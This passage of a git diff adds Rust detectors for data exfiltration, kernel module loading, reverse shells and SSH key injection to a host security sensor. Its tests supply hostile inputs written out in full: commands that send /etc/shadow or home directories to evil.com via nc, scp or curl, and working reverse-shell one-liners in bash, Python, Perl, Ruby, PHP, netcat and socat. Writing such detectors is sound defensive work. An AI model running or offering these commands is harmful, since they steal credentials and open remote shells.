+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_read_event("/etc/shadow", "python3", 1234, now))
+            .is_none());
+
+        // Connect after window expires
+        let inc = det.process(&connect_event(
+            "python3",
+            1234,
+            "203.0.113.5",
+            4444,
+            now + Duration::seconds(61),
+        ));
+        assert!(inc.is_none());
+    }
+
+    #[test]
+    fn no_alert_for_different_pid() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        // PID 1234 reads sensitive file
+        assert!(det
+            .process(&file_read_event("/etc/shadow", "python3", 1234, now))
+            .is_none());
+
+        // Different PID connects — no correlation
+        let inc = det.process(&connect_event(
+            "curl",
+            5678,
+            "203.0.113.5",
+            4444,
+            now + Duration::seconds(5),
+        ));
+        assert!(inc.is_none());
+    }
+
+    #[test]
+    fn detects_cat_shadow_pipe_nc() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "cat /etc/shadow | nc evil.com 4444",
+            "bash",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+        assert!(inc.tags.contains(&"exfiltration".to_string()));
+    }
+
+    #[test]
+    fn detects_scp_shadow() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "scp /etc/shadow user@evil.com:/tmp/",
+            "scp",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+    }
+
+    #[test]
+    fn detects_tar_pipe_curl() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        let inc = det.process(&command_event(
+            "tar czf - /home/user | curl -X POST http://evil.com/upload -d @-",
+            "bash",
+            1234,
+            now,
+        ));
+        assert!(inc.is_some());
+    }
+
+    #[test]
+    fn ignores_normal_file_reads() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_read_event("/var/log/syslog", "tail", 1234, now))
+            .is_none());
+        assert!(det
+            .process(&file_read_event("/etc/hostname", "cat", 1235, now))
+            .is_none());
+    }
+
+    #[test]
+    fn ignores_normal_commands() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&command_event("curl http://example.com", "curl", 1234, now))
+            .is_none());
+        assert!(det
+            .process(&command_event("cat /var/log/syslog", "cat", 1235, now))
+            .is_none());
+    }
+
+    #[test]
+    fn cooldown_suppresses_realert() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        // First detection
+        assert!(det
+            .process(&file_read_event("/etc/shadow", "python3", 1234, now))
+            .is_none());
+        assert!(det
+            .process(&connect_event(
+                "python3",
+                1234,
+                "203.0.113.5",
+                4444,
+                now + Duration::seconds(5)
+            ))
+            .is_some());
+
+        // Re-read and re-connect within cooldown — suppressed
+        assert!(det
+            .process(&file_read_event(
+                "/etc/shadow",
+                "python3",
+                1234,
+                now + Duration::seconds(10)
+            ))
+            .is_none());
+        assert!(det
+            .process(&connect_event(
+                "python3",
+                1234,
+                "203.0.113.5",
+                4444,
+                now + Duration::seconds(15)
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn detects_env_file_exfiltration() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_read_event("/app/.env", "node", 3000, now))
+            .is_none());
+
+        let inc = det.process(&connect_event(
+            "node",
+            3000,
+            "198.51.100.1",
+            443,
+            now + Duration::seconds(2),
+        ));
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains(".env"));
+    }
+
+    #[test]
+    fn detects_database_dump_exfiltration() {
+        let mut det = DataExfiltrationDetector::new("test", 60, 300);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&file_read_event("/tmp/backup.sql", "python3", 4000, now))
+            .is_none());
+
+        let inc = det.process(&connect_event(
+            "python3",
+            4000,
+            "198.51.100.2",
+            8080,
+            now + Duration::seconds(3),
+        ));
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains("backup.sql"));
+    }
+}

--- a/crates/sensor/src/detectors/kernel_module_load.rs
+++ b/crates/sensor/src/detectors/kernel_module_load.rs
@@ -1,0 +1,444 @@
+use std::collections::HashMap;
+
+use chrono::{DateTime, Duration, Utc};
+use innerwarden_core::{event::Event, event::Severity, incident::Incident};
+
+/// Standard kernel modules that are commonly loaded by the system.
+/// These are allowlisted to reduce false positives.
+const ALLOWED_MODULES: &[&str] = &[
+    "ext4",
+    "xfs",
+    "btrfs",
+    "nfs",
+    "nfsd",
+    "ip_tables",
+    "ip6_tables",
+    "iptable_filter",
+    "iptable_nat",
+    "nf_conntrack",
+    "nf_nat",
+    "nf_tables",
+    "nft_chain_nat",
+    "veth",
+    "overlay",
+    "bridge",
+    "br_netfilter",
+    "dm_mod",
+    "dm_crypt",
+    "loop",
+    "fuse",
+    "tun",
+    "tap",
+    "bonding",
+    "8021q",
+    "vxlan",
+    "wireguard",
+];
+
+/// Prefixes for standard modules that come in families (virtio_*, kvm*, hv_*).
+const ALLOWED_PREFIXES: &[&str] = &["virtio_", "kvm", "hv_", "xen_", "vmw_", "nf_"];
+
+/// Suspicious paths — loading from these indicates a rootkit or exploit.
+const SUSPICIOUS_PATHS: &[&str] = &["/tmp/", "/dev/shm/", "/home/", "/var/tmp/"];
+
+/// Detects runtime kernel module loading via insmod/modprobe/rmmod.
+///
+/// Kernel module loading at runtime can indicate rootkit installation or
+/// privilege escalation. Standard system modules are allowlisted; anything
+/// else raises High severity. Loading from /tmp, /dev/shm, or /home raises
+/// Critical severity as a rootkit indicator.
+pub struct KernelModuleLoadDetector {
+    cooldown: Duration,
+    alerted: HashMap<String, DateTime<Utc>>,
+    host: String,
+}
+
+impl KernelModuleLoadDetector {
+    pub fn new(host: impl Into<String>, cooldown_seconds: u64) -> Self {
+        Self {
+            cooldown: Duration::seconds(cooldown_seconds as i64),
+            alerted: HashMap::new(),
+            host: host.into(),
+        }
+    }
+
+    /// Check if a module name is in the allowlist.
+    fn is_allowed_module(module: &str) -> bool {
+        if ALLOWED_MODULES.contains(&module) {
+            return true;
+        }
+        for prefix in ALLOWED_PREFIXES {
+            if module.starts_with(prefix) {
+                return true;
+            }
+        }
+        false
+    }
+
+    /// Check if the command involves loading from a suspicious path.
+    fn has_suspicious_path(command: &str) -> bool {
+        SUSPICIOUS_PATHS.iter().any(|p| command.contains(p))
+    }
+
+    /// Extract the module name from the command string.
+    /// Handles: "insmod /path/to/module.ko", "modprobe module_name", "rmmod module_name"
+    fn extract_module_name(command: &str) -> Option<&str> {
+        let parts: Vec<&str> = command.split_whitespace().collect();
+        if parts.len() < 2 {
+            return None;
+        }
+
+        // Find the argument after insmod/modprobe/rmmod
+        for (i, part) in parts.iter().enumerate() {
+            let base = part.rsplit('/').next().unwrap_or(part);
+            if base == "insmod" || base == "modprobe" || base == "rmmod" {
+                // Get the next non-flag argument
+                for arg in &parts[i + 1..] {
+                    if arg.starts_with('-') {
+                        continue;
+                    }
+                    // For insmod, the argument is a path — extract the filename
+                    if base == "insmod" {
+                        let filename = arg.rsplit('/').next().unwrap_or(arg);
+                        return Some(
+                            filename.strip_suffix(".ko").unwrap_or(
+                                filename.strip_suffix(".ko.xz").unwrap_or(
+                                    filename.strip_suffix(".ko.zst").unwrap_or(filename),
+                                ),
+                            ),
+                        );
+                    }
+                    return Some(arg);
+                }
+            }
+        }
+        None
+    }
+
+    /// Check if the command is a kernel module operation.
+    fn is_module_command(command: &str) -> bool {
+        let lower = command.to_lowercase();
+        lower.contains("insmod") || lower.contains("modprobe") || lower.contains("rmmod")
+    }
+
+    pub fn process(&mut self, event: &Event) -> Option<Incident> {
+        if event.kind != "shell.command_exec" && event.kind != "process.exec" {
+            return None;
+        }
+
+        let command = event.details["command"].as_str().unwrap_or("");
+        if command.is_empty() || !Self::is_module_command(command) {
+            return None;
+        }
+
+        let module_name = Self::extract_module_name(command).unwrap_or("unknown");
+
+        // Skip allowlisted modules
+        if Self::is_allowed_module(module_name) {
+            return None;
+        }
+
+        let pid = event.details["pid"].as_u64().unwrap_or(0) as u32;
+        let uid = event.details["uid"].as_u64().unwrap_or(0) as u32;
+        let comm = event.details["comm"]
+            .as_str()
+            .unwrap_or("unknown")
+            .to_string();
+
+        let now = event.ts;
+        let alert_key = format!("kmod:{}:{}", module_name, comm);
+
+        // Cooldown check
+        if let Some(&last) = self.alerted.get(&alert_key) {
+            if now - last < self.cooldown {
+                return None;
+            }
+        }
+        self.alerted.insert(alert_key, now);
+
+        // Determine severity: Critical if loading from suspicious paths
+        let severity = if Self::has_suspicious_path(command) {
+            Severity::Critical
+        } else {
+            Severity::High
+        };
+
+        let summary = if Self::has_suspicious_path(command) {
+            format!(
+                "Rootkit indicator: kernel module {module_name} loaded from suspicious path by {comm} (pid={pid}, uid={uid})"
+            )
+        } else {
+            format!(
+                "Non-standard kernel module loaded: {module_name} by {comm} (pid={pid}, uid={uid})"
+            )
+        };
+
+        // Prune stale entries
+        if self.alerted.len() > 500 {
+            let cutoff = now - self.cooldown;
+            self.alerted.retain(|_, ts| *ts > cutoff);
+        }
+
+        Some(Incident {
+            ts: now,
+            host: self.host.clone(),
+            incident_id: format!(
+                "kernel_module:{}:{}:{}",
+                module_name,
+                comm,
+                now.format("%Y-%m-%dT%H:%MZ")
+            ),
+            severity,
+            title: format!("Kernel module load detected: {module_name}"),
+            summary,
+            evidence: serde_json::json!([{
+                "kind": "kernel_module_load",
+                "module": module_name,
+                "command": command,
+                "comm": comm,
+                "pid": pid,
+                "uid": uid,
+            }]),
+            recommended_checks: vec![
+                format!("Investigate module {module_name} — is it a known system module?"),
+                format!("Check who loaded it: ps -o user= -p {pid}"),
+                "List loaded modules: lsmod | grep suspicious".to_string(),
+                format!("Check module file: modinfo {module_name}"),
+                "If unexpected: rmmod the module and investigate the attack vector".to_string(),
+            ],
+            tags: vec![
+                "kernel-module".to_string(),
+                "persistence".to_string(),
+                "rootkit".to_string(),
+            ],
+            entities: vec![],
+        })
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn module_event(command: &str, comm: &str, pid: u32, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "shell.command_exec".to_string(),
+            severity: Severity::Info,
+            summary: format!("Shell command executed: {command}"),
+            details: serde_json::json!({
+                "pid": pid,
+                "uid": 0,
+                "ppid": 1,
+                "comm": comm,
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string(), "exec".to_string()],
+            entities: vec![],
+        }
+    }
+
+    #[test]
+    fn detects_insmod_unknown_module() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        let inc = det.process(&module_event("insmod /opt/rootkit.ko", "bash", 1234, now));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+        assert!(inc.title.contains("rootkit"));
+    }
+
+    #[test]
+    fn detects_modprobe_unknown_module() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        let inc = det.process(&module_event("modprobe evil_module", "bash", 1234, now));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+        assert!(inc.title.contains("evil_module"));
+    }
+
+    #[test]
+    fn detects_rmmod_unknown_module() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        let inc = det.process(&module_event("rmmod evil_module", "bash", 1234, now));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::High);
+    }
+
+    #[test]
+    fn allows_standard_modules() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&module_event("modprobe ext4", "mount", 100, now))
+            .is_none());
+        assert!(det
+            .process(&module_event("modprobe nf_conntrack", "iptables", 101, now))
+            .is_none());
+        assert!(det
+            .process(&module_event("modprobe overlay", "docker", 102, now))
+            .is_none());
+        assert!(det
+            .process(&module_event(
+                "insmod /lib/modules/5.15/veth.ko",
+                "dockerd",
+                103,
+                now
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn allows_prefix_modules() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&module_event("modprobe virtio_net", "systemd", 100, now))
+            .is_none());
+        assert!(det
+            .process(&module_event("modprobe kvm_intel", "qemu", 101, now))
+            .is_none());
+        assert!(det
+            .process(&module_event("modprobe hv_vmbus", "systemd", 102, now))
+            .is_none());
+    }
+
+    #[test]
+    fn critical_for_suspicious_paths() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        let inc = det.process(&module_event("insmod /tmp/rootkit.ko", "bash", 1234, now));
+        assert!(inc.is_some());
+        let inc = inc.unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.summary.contains("Rootkit indicator"));
+
+        let inc2 = det.process(&module_event(
+            "insmod /dev/shm/backdoor.ko",
+            "sh",
+            1235,
+            now,
+        ));
+        assert!(inc2.is_some());
+        assert_eq!(inc2.unwrap().severity, Severity::Critical);
+
+        let inc3 = det.process(&module_event("insmod /home/user/evil.ko", "sh", 1236, now));
+        assert!(inc3.is_some());
+        assert_eq!(inc3.unwrap().severity, Severity::Critical);
+    }
+
+    #[test]
+    fn cooldown_suppresses_realert() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&module_event("modprobe evil", "bash", 1234, now))
+            .is_some());
+        assert!(det
+            .process(&module_event(
+                "modprobe evil",
+                "bash",
+                1234,
+                now + Duration::seconds(10)
+            ))
+            .is_none());
+    }
+
+    #[test]
+    fn cooldown_expires_and_realerts() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&module_event("modprobe evil", "bash", 1234, now))
+            .is_some());
+        assert!(det
+            .process(&module_event(
+                "modprobe evil",
+                "bash",
+                1234,
+                now + Duration::seconds(601)
+            ))
+            .is_some());
+    }
+
+    #[test]
+    fn ignores_non_exec_events() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        let event = Event {
+            ts: now,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "network.outbound_connect".to_string(),
+            severity: Severity::Info,
+            summary: "not an exec".to_string(),
+            details: serde_json::json!({}),
+            tags: vec![],
+            entities: vec![],
+        };
+        assert!(det.process(&event).is_none());
+    }
+
+    #[test]
+    fn ignores_normal_commands() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        assert!(det
+            .process(&module_event("ls -la /tmp", "bash", 1234, now))
+            .is_none());
+        assert!(det
+            .process(&module_event("curl http://example.com", "curl", 1235, now))
+            .is_none());
+        assert!(det
+            .process(&module_event("cat /etc/passwd", "cat", 1236, now))
+            .is_none());
+    }
+
+    #[test]
+    fn handles_process_exec_kind() {
+        let mut det = KernelModuleLoadDetector::new("test", 600);
+        let now = Utc::now();
+
+        let event = Event {
+            ts: now,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "process.exec".to_string(),
+            severity: Severity::Info,
+            summary: "Process executed: insmod".to_string(),
+            details: serde_json::json!({
+                "pid": 1234,
+                "uid": 0,
+                "ppid": 1,
+                "comm": "insmod",
+                "command": "insmod /opt/suspicious.ko",
+            }),
+            tags: vec!["ebpf".to_string(), "exec".to_string()],
+            entities: vec![],
+        };
+        let inc = det.process(&event);
+        assert!(inc.is_some());
+        assert!(inc.unwrap().title.contains("suspicious"));
+    }
+}

--- a/crates/sensor/src/detectors/mod.rs
+++ b/crates/sensor/src/detectors/mod.rs
@@ -1,6 +1,8 @@
 pub mod c2_callback;
 pub mod container_escape;
 pub mod credential_stuffing;
+pub mod crontab_persistence;
+pub mod data_exfiltration;
 pub mod distributed_ssh;
 pub mod suspicious_login;
 
@@ -27,15 +29,19 @@ pub mod docker_anomaly;
 pub mod execution_guard;
 pub mod fileless;
 pub mod integrity_alert;
+pub mod kernel_module_load;
 pub mod lateral_movement;
 pub mod log_tampering;
 pub mod osquery_anomaly;
 pub mod port_scan;
 pub mod privesc;
 pub mod process_tree;
+pub mod reverse_shell;
 pub mod search_abuse;
 pub mod ssh_bruteforce;
+pub mod ssh_key_injection;
 pub mod sudo_abuse;
 pub mod suricata_alert;
 pub mod user_agent_scanner;
 pub mod web_scan;
+pub mod web_shell;

--- a/crates/sensor/src/detectors/reverse_shell.rs
+++ b/crates/sensor/src/detectors/reverse_shell.rs
@@ -1,0 +1,413 @@
+use std::collections::HashMap;
+
+use chrono::{DateTime, Duration, Utc};
+use innerwarden_core::{event::Event, event::Severity, incident::Incident};
+
+/// Detects reverse shell patterns in process execution events.
+///
+/// Reverse shells allow attackers to gain interactive shell access from a
+/// remote host. This detector recognises common patterns across multiple
+/// languages and toolkits:
+///
+///   - Bash `/dev/tcp/` and `/dev/udp/` redirects
+///   - Netcat (`nc -e`, `ncat -e`, `nc -c`, `netcat -e`)
+///   - Python `socket` + `connect`
+///   - Perl `socket` + `INET`
+///   - Ruby `TCPSocket`
+///   - PHP `fsockopen`
+///   - mkfifo + nc pipe
+///   - Socat `exec` + `tcp`
+pub struct ReverseShellDetector {
+    host: String,
+    cooldown: Duration,
+    /// Suppress re-alerts per (command_hash) within cooldown window.
+    alerted: HashMap<u64, DateTime<Utc>>,
+}
+
+impl ReverseShellDetector {
+    pub fn new(host: impl Into<String>, cooldown_seconds: u64) -> Self {
+        Self {
+            host: host.into(),
+            cooldown: Duration::seconds(cooldown_seconds as i64),
+            alerted: HashMap::new(),
+        }
+    }
+
+    /// Returns the matched pattern name if the command looks like a reverse shell.
+    fn detect_pattern(cmd: &str) -> Option<&'static str> {
+        let lower = cmd.to_lowercase();
+
+        // Bash reverse shell: /dev/tcp/ or /dev/udp/
+        if lower.contains("/dev/tcp/") || lower.contains("/dev/udp/") {
+            return Some("bash_dev_tcp");
+        }
+
+        // Netcat variants: nc -e, ncat -e, nc -c, netcat -e
+        if (lower.contains("nc ") || lower.contains("ncat ") || lower.contains("netcat "))
+            && (lower.contains(" -e ") || lower.contains(" -c "))
+        {
+            return Some("netcat_shell");
+        }
+
+        // Python reverse shell: python + socket + connect
+        if (lower.contains("python") || lower.contains("python3") || lower.contains("python2"))
+            && lower.contains("socket")
+            && lower.contains("connect")
+        {
+            return Some("python_reverse_shell");
+        }
+
+        // Perl reverse shell: perl + socket + INET
+        if lower.contains("perl") && lower.contains("socket") && lower.contains("inet") {
+            return Some("perl_reverse_shell");
+        }
+
+        // Ruby reverse shell: ruby + TCPSocket
+        if lower.contains("ruby") && lower.contains("tcpsocket") {
+            return Some("ruby_reverse_shell");
+        }
+
+        // PHP reverse shell: php + fsockopen
+        if lower.contains("php") && lower.contains("fsockopen") {
+            return Some("php_reverse_shell");
+        }
+
+        // mkfifo pipe: mkfifo + nc
+        if lower.contains("mkfifo") && (lower.contains("nc ") || lower.contains("ncat ")) {
+            return Some("mkfifo_pipe");
+        }
+
+        // Socat shell: socat + exec + tcp
+        if lower.contains("socat") && lower.contains("exec") && lower.contains("tcp") {
+            return Some("socat_shell");
+        }
+
+        None
+    }
+
+    /// Simple hash for cooldown keying — avoids storing full command strings.
+    fn hash_command(cmd: &str) -> u64 {
+        use std::hash::{Hash, Hasher};
+        let mut hasher = std::collections::hash_map::DefaultHasher::new();
+        cmd.hash(&mut hasher);
+        hasher.finish()
+    }
+
+    pub fn process(&mut self, event: &Event) -> Option<Incident> {
+        if event.kind != "shell.command_exec" && event.kind != "process.exec" {
+            return None;
+        }
+
+        let command = event.details.get("command").and_then(|v| v.as_str());
+        let args = event.details.get("args").and_then(|v| v.as_str());
+
+        // Check both command and args fields; combine for pattern matching
+        let text = match (command, args) {
+            (Some(c), Some(a)) => format!("{c} {a}"),
+            (Some(c), None) => c.to_string(),
+            (None, Some(a)) => a.to_string(),
+            (None, None) => return None,
+        };
+
+        if text.is_empty() {
+            return None;
+        }
+
+        let pattern = Self::detect_pattern(&text)?;
+
+        let now = event.ts;
+        let key = Self::hash_command(&text);
+
+        // Cooldown check
+        if let Some(&last) = self.alerted.get(&key) {
+            if now - last < self.cooldown {
+                return None;
+            }
+        }
+        self.alerted.insert(key, now);
+
+        let pid = event
+            .details
+            .get("pid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+        let uid = event
+            .details
+            .get("uid")
+            .and_then(|v| v.as_u64())
+            .unwrap_or(0) as u32;
+        let comm = event
+            .details
+            .get("comm")
+            .and_then(|v| v.as_str())
+            .unwrap_or("unknown");
+
+        // Truncate command for display
+        let display_cmd = if text.len() > 200 {
+            format!("{}...", &text[..200])
+        } else {
+            text.clone()
+        };
+
+        // Prune stale entries
+        if self.alerted.len() > 1000 {
+            let cutoff = now - self.cooldown;
+            self.alerted.retain(|_, ts| *ts > cutoff);
+        }
+
+        Some(Incident {
+            ts: now,
+            host: self.host.clone(),
+            incident_id: format!(
+                "reverse_shell:{pattern}:{pid}:{}",
+                now.format("%Y-%m-%dT%H:%MZ")
+            ),
+            severity: Severity::Critical,
+            title: format!("Reverse shell detected ({pattern}): {display_cmd}"),
+            summary: format!(
+                "Reverse shell pattern '{pattern}' detected in process {comm} \
+                 (pid={pid}, uid={uid}): {display_cmd}"
+            ),
+            evidence: serde_json::json!([{
+                "kind": "reverse_shell",
+                "pattern": pattern,
+                "comm": comm,
+                "pid": pid,
+                "uid": uid,
+                "command": text,
+            }]),
+            recommended_checks: vec![
+                format!("Kill process immediately: kill -9 {pid}"),
+                format!("Investigate parent process: ps -o ppid= -p {pid}"),
+                "Check for network connections: ss -tunp".to_string(),
+                "Review user account for compromise".to_string(),
+                "Check for persistence mechanisms: crontab -l, ~/.bashrc, /etc/cron.d/".to_string(),
+            ],
+            tags: vec!["reverse_shell".to_string(), "post_exploitation".to_string()],
+            entities: vec![],
+        })
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn exec_event(command: &str, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "shell.command_exec".to_string(),
+            severity: Severity::Info,
+            summary: format!("Shell command: {command}"),
+            details: serde_json::json!({
+                "pid": 1234,
+                "uid": 1000,
+                "ppid": 1,
+                "comm": "bash",
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    fn process_exec_event(command: &str, ts: DateTime<Utc>) -> Event {
+        Event {
+            ts,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "process.exec".to_string(),
+            severity: Severity::Info,
+            summary: format!("Process exec: {command}"),
+            details: serde_json::json!({
+                "pid": 5678,
+                "uid": 0,
+                "ppid": 1,
+                "comm": "sh",
+                "command": command,
+            }),
+            tags: vec!["ebpf".to_string()],
+            entities: vec![],
+        }
+    }
+
+    #[test]
+    fn detects_bash_dev_tcp() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&exec_event("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1", now))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("bash_dev_tcp"));
+    }
+
+    #[test]
+    fn detects_bash_dev_udp() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&exec_event("bash -i >& /dev/udp/10.0.0.1/53 0>&1", now))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("bash_dev_tcp"));
+    }
+
+    #[test]
+    fn detects_netcat_e() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&exec_event("nc -e /bin/sh 10.0.0.1 4444", now))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+        assert!(inc.title.contains("netcat_shell"));
+    }
+
+    #[test]
+    fn detects_ncat_e() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det.process(&exec_event("ncat -e /bin/bash 10.0.0.1 4444", now));
+        assert!(inc.is_some());
+    }
+
+    #[test]
+    fn detects_nc_c() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&exec_event("nc -c /bin/sh 10.0.0.1 4444", now))
+            .unwrap();
+        assert!(inc.title.contains("netcat_shell"));
+    }
+
+    #[test]
+    fn detects_python_reverse_shell() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0)'";
+        let inc = det.process(&exec_event(cmd, now)).unwrap();
+        assert!(inc.title.contains("python_reverse_shell"));
+    }
+
+    #[test]
+    fn detects_perl_reverse_shell() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "perl -e 'use Socket;$i=\"10.0.0.1\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)))'";
+        let inc = det.process(&exec_event(cmd, now)).unwrap();
+        assert!(inc.title.contains("perl_reverse_shell"));
+    }
+
+    #[test]
+    fn detects_ruby_reverse_shell() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "ruby -rsocket -e 'f=TCPSocket.open(\"10.0.0.1\",4444).to_i'";
+        let inc = det.process(&exec_event(cmd, now)).unwrap();
+        assert!(inc.title.contains("ruby_reverse_shell"));
+    }
+
+    #[test]
+    fn detects_php_reverse_shell() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "php -r '$sock=fsockopen(\"10.0.0.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'";
+        let inc = det.process(&exec_event(cmd, now)).unwrap();
+        assert!(inc.title.contains("php_reverse_shell"));
+    }
+
+    #[test]
+    fn detects_mkfifo_pipe() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "mkfifo /tmp/f; nc 10.0.0.1 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1";
+        let inc = det.process(&exec_event(cmd, now)).unwrap();
+        assert!(inc.title.contains("mkfifo_pipe"));
+    }
+
+    #[test]
+    fn detects_socat_shell() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444";
+        let inc = det.process(&exec_event(cmd, now)).unwrap();
+        assert!(inc.title.contains("socat_shell"));
+    }
+
+    #[test]
+    fn cooldown_suppresses_duplicate() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1";
+        assert!(det.process(&exec_event(cmd, now)).is_some());
+        assert!(det
+            .process(&exec_event(cmd, now + Duration::seconds(10)))
+            .is_none());
+    }
+
+    #[test]
+    fn fires_again_after_cooldown() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let cmd = "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1";
+        assert!(det.process(&exec_event(cmd, now)).is_some());
+        assert!(det
+            .process(&exec_event(cmd, now + Duration::seconds(301)))
+            .is_some());
+    }
+
+    #[test]
+    fn ignores_normal_commands() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        assert!(det.process(&exec_event("ls -la /tmp", now)).is_none());
+        assert!(det
+            .process(&exec_event("curl https://example.com", now))
+            .is_none());
+        assert!(det
+            .process(&exec_event("python3 -m http.server", now))
+            .is_none());
+        assert!(det.process(&exec_event("nc -l -p 8080", now)).is_none());
+    }
+
+    #[test]
+    fn ignores_irrelevant_event_kinds() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let event = Event {
+            ts: now,
+            host: "test".to_string(),
+            source: "ebpf".to_string(),
+            kind: "file.write_access".to_string(),
+            severity: Severity::Info,
+            summary: "file write".to_string(),
+            details: serde_json::json!({
+                "command": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
+            }),
+            tags: vec![],
+            entities: vec![],
+        };
+        assert!(det.process(&event).is_none());
+    }
+
+    #[test]
+    fn works_with_process_exec_kind() {
+        let mut det = ReverseShellDetector::new("test", 300);
+        let now = Utc::now();
+        let inc = det
+            .process(&process_exec_event(
+                "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
+                now,
+            ))
+            .unwrap();
+        assert_eq!(inc.severity, Severity::Critical);
+    }
+}

--- a/crates/sensor/src/detectors/ssh_key_injection.rs
+++ b/crates/sensor/src/detectors/ssh_key_injection.rs
@@ -1,0 +1,476 @@
+use std::collections::HashMap;
+
+use chrono::{DateTime, Duration, Utc};
+use innerwarden_core::{entities::EntityRef, event::Event, event::Severity, incident::Incident};
+
+/// Detects unauthorized SSH key modifications.
+///
+/// SSH key injection is a common persistence technique: an attacker writes
+/// their public key into `~/.ssh/authorized_keys` to maintain access even
+/// after the original vulnerability is patched.
+///
+/// Detection patterns:
+///   - File write to any path containing `.ssh/authorized_keys`
